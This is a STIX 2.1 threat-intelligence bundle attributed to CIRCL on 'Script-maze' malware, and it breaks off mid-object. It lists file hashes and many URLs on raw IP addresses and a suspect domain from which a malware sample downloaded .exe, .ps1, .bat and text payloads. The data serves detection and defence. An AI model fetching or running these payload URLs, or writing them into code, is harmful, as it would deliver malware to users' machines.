2023-04-21 14:44:17 +00:00
{
"type" : "bundle" ,
"id" : "bundle--5cea4d65-d448-4e7c-af4a-4fe3950d210f" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:37:38.000Z" ,
"modified" : "2019-05-26T08:37:38.000Z" ,
"name" : "CIRCL" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--5cea4d65-d448-4e7c-af4a-4fe3950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:37:38.000Z" ,
"modified" : "2019-05-26T08:37:38.000Z" ,
"name" : "Script-maze historical malware seen" ,
"published" : "2019-05-26T08:37:57Z" ,
"object_refs" : [
"indicator--5cea4d6d-f9e0-4c71-ab29-2a8d950d210f" ,
"indicator--5cea4d6d-1624-4a75-bfb1-2a8d950d210f" ,
"indicator--5cea4d6d-28f8-454f-9c29-2a8d950d210f" ,
"indicator--5cea4d6d-4dc4-4313-94f7-2a8d950d210f" ,
"indicator--5cea4d6d-2750-40d2-be58-2a8d950d210f" ,
"indicator--5cea4d6d-3444-4e63-b177-2a8d950d210f" ,
"indicator--5cea4d6d-8490-4f28-8174-2a8d950d210f" ,
"indicator--5cea4d6d-5fd0-44b4-9fe2-2a8d950d210f" ,
"indicator--5cea4d6d-5410-4c49-ab62-2a8d950d210f" ,
"indicator--5cea4e47-d544-4169-8690-47b5950d210f" ,
"indicator--5cea4fae-4d38-4905-acc7-438e950d210f" ,
"indicator--5cea4fd6-bbc8-4e1d-85d3-4391950d210f" ,
"indicator--5cea4fd6-13b8-4e59-b16c-4d59950d210f" ,
"indicator--5cea4fd6-4038-44f6-997e-45ec950d210f" ,
"indicator--5cea4fd6-9f64-4154-9ea8-4b50950d210f" ,
"indicator--5cea4fd6-5828-4649-91d3-492e950d210f" ,
"indicator--5cea4fd6-a7fc-49a8-80cb-4948950d210f" ,
"indicator--5cea4fd6-af8c-402c-be36-426a950d210f" ,
"indicator--5cea4fd6-2738-414a-9d19-43cf950d210f" ,
"indicator--5cea4fd6-9a74-4407-927f-4df9950d210f" ,
"indicator--5cea4fd6-cff8-4e3b-a350-42a9950d210f" ,
"indicator--5cea4fd6-4bcc-45be-a51a-404a950d210f" ,
"indicator--5cea4fd6-24d8-45be-8a89-4940950d210f" ,
"indicator--5cea4fd6-83a0-4e47-a433-4b92950d210f" ,
"indicator--5cea4fd6-f990-4ded-887d-497e950d210f" ,
"observed-data--5cea4fd6-3614-4936-adaa-470f950d210f" ,
"url--5cea4fd6-3614-4936-adaa-470f950d210f" ,
"indicator--5cea4fd6-9268-41e9-ab92-49f9950d210f" ,
"indicator--5cea4fd6-4488-40f1-8920-4e1a950d210f" ,
"indicator--5cea4fd6-a3d8-4c30-86d5-4959950d210f" ,
"indicator--5cea4fd6-d2f8-46ec-9c24-4b42950d210f" ,
"indicator--5cea5026-2614-4801-98d5-41c8950d210f" ,
"indicator--380c7782-2dd4-443a-9108-bf700a7d0b43" ,
"x-misp-object--7e77557c-59e5-421e-9ac1-7d8d4d7dc322" ,
"indicator--94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2" ,
"x-misp-object--550f6b80-a32c-41d9-93c4-db9c41528a0b" ,
"indicator--b58ad199-5bc6-4892-b6ea-1758b79ea763" ,
"x-misp-object--57dc22c7-3d93-437a-9930-7312a8472014" ,
"indicator--b2749b84-7bae-418b-b58a-278ee29eefea" ,
"x-misp-object--bf3c1c50-d629-446c-a802-a541481256f3" ,
"indicator--7eab9890-1152-4540-b14c-b1713dd74db7" ,
"x-misp-object--4a5526a0-66ef-4a36-859c-9fae1cf3a73e" ,
"indicator--5f4ce8ec-cff2-422d-977a-34ef4867b8f6" ,
"x-misp-object--ab17e198-674e-4648-8c02-f3c1fcb73d3f" ,
"indicator--7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c" ,
"x-misp-object--e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7" ,
"indicator--94b76905-bc8e-4167-9633-b19262f34af8" ,
"x-misp-object--5c2ed803-b879-4d3c-9d36-583c1fde2562" ,
"indicator--3751d8a9-13b3-4049-82ec-9607df7fc404" ,
"x-misp-object--ecfc06ea-0951-451d-8b9a-4aeae8c7f133" ,
"malware--5cea4e05-04c4-4f5f-ba43-4d3f950d210f" ,
"indicator--5cea4e93-8834-4dd5-992d-4763950d210f" ,
"indicator--195d072c-cab6-4370-b8ea-cf509e00959b" ,
"x-misp-object--e0949b09-cf58-44f5-9455-d6253e56a131" ,
2023-05-19 09:05:37 +00:00
"relationship--6eb30338-6dc9-477b-8de2-67c2ed6c814a" ,
"relationship--cf2fddd3-83bf-46e9-b475-35007bd258cc" ,
"relationship--65989f15-22ab-401b-ba4a-21aeee25e7cc" ,
"relationship--14d5fa60-cda6-4160-828e-29e5198dc170" ,
"relationship--0da85027-872e-447b-8495-bc8a75a1f2b4" ,
"relationship--77081070-a3a2-4ba6-8459-33b48d00afd4" ,
"relationship--18ce4b1b-1f08-4264-828c-11a1550e504d" ,
"relationship--ceee9fc7-5f89-4357-96ec-0afeb2451e35" ,
"relationship--d891033f-fbd3-407d-9af1-3fb4a52c1d50" ,
"relationship--84e212cd-36ce-4cee-a788-132af9eac833"
2023-04-21 14:44:17 +00:00
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"type:OSINT" ,
"osint:lifetime=\"perpetual\"" ,
"osint:certainty=\"50\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-f9e0-4c71-ab29-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = 'ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-1624-4a75-bfb1-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = '6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-28f8-454f-9c29-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = 'fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-4dc4-4313-94f7-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = '968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-2750-40d2-be58-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = '58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-3444-4e63-b177-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = '2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-8490-4f28-8174-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = '65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-5fd0-44b4-9fe2-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = '84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4d6d-5410-4c49-ab62-2a8d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:25:17.000Z" ,
"modified" : "2019-05-26T08:25:17.000Z" ,
"pattern" : "[file:hashes.SHA256 = 'b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:25:17Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4e47-d544-4169-8690-47b5950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:28:55.000Z" ,
"modified" : "2019-05-26T08:28:55.000Z" ,
"pattern" : "[url:value = 'http://74.222.1.38:8888/close.bat']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:28:55Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fae-4d38-4905-acc7-438e950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:34:54.000Z" ,
"modified" : "2019-05-26T08:34:54.000Z" ,
"pattern" : "[file:hashes.MD5 = '4d437b5614edcc7d1ee5e4bcf5785ef9']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:34:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"md5\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-bbc8-4e1d-85d3-4391950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://wmi.1217bye.host/2.txt']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-13b8-4e59-b16c-4d59950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://173.247.239.186/ok.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-4038-44f6-997e-45ec950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://173.247.239.186/upsupx.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-9f64-4154-9ea8-4b50950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://173.247.239.186/u.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-5828-4649-91d3-492e950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://45.58.135.106/xpdown.dat']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-a7fc-49a8-80cb-4948950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://45.58.135.106/ok/down.html']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-af8c-402c-be36-426a950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://45.58.135.106/ok/64.html']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-2738-414a-9d19-43cf950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://223.25.247.240/ok/ups.html']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-9a74-4407-927f-4df9950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://45.58.135.106/ok/vers.html']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-cff8-4e3b-a350-42a9950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://45.58.135.106/kill.txt']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-4bcc-45be-a51a-404a950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://wmi.1217bye.host/S.ps1']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-24d8-45be-8a89-4940950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://173.208.139.170/s.txt']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-83a0-4e47-a433-4b92950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://35.182.171.137/l.txt']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-f990-4ded-887d-497e950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://74.222.1.38/up.txt']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5cea4fd6-3614-4936-adaa-470f950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:36:05.000Z" ,
"modified" : "2019-05-26T08:36:05.000Z" ,
"first_observed" : "2019-05-26T08:36:05Z" ,
"last_observed" : "2019-05-26T08:36:05Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--5cea4fd6-3614-4936-adaa-470f950d210f"
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--5cea4fd6-3614-4936-adaa-470f950d210f" ,
"value" : "http://2019.ip138.com/ic.asp"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-9268-41e9-ab92-49f9950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://45.58.135.106/downs.txt']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-4488-40f1-8920-4e1a950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://185.112.156.92/downs.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-a3d8-4c30-86d5-4959950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://66.117.6.174/ups.rar']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cea4fd6-d2f8-46ec-9c24-4b42950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-05-26T08:35:34.000Z" ,
"modified" : "2019-05-26T08:35:34.000Z" ,
"description" : "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9" ,
"pattern" : "[url:value = 'http://198.148.90.34/b.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-26T08:35:34Z" ,
"kill_chain_phases" : [
{
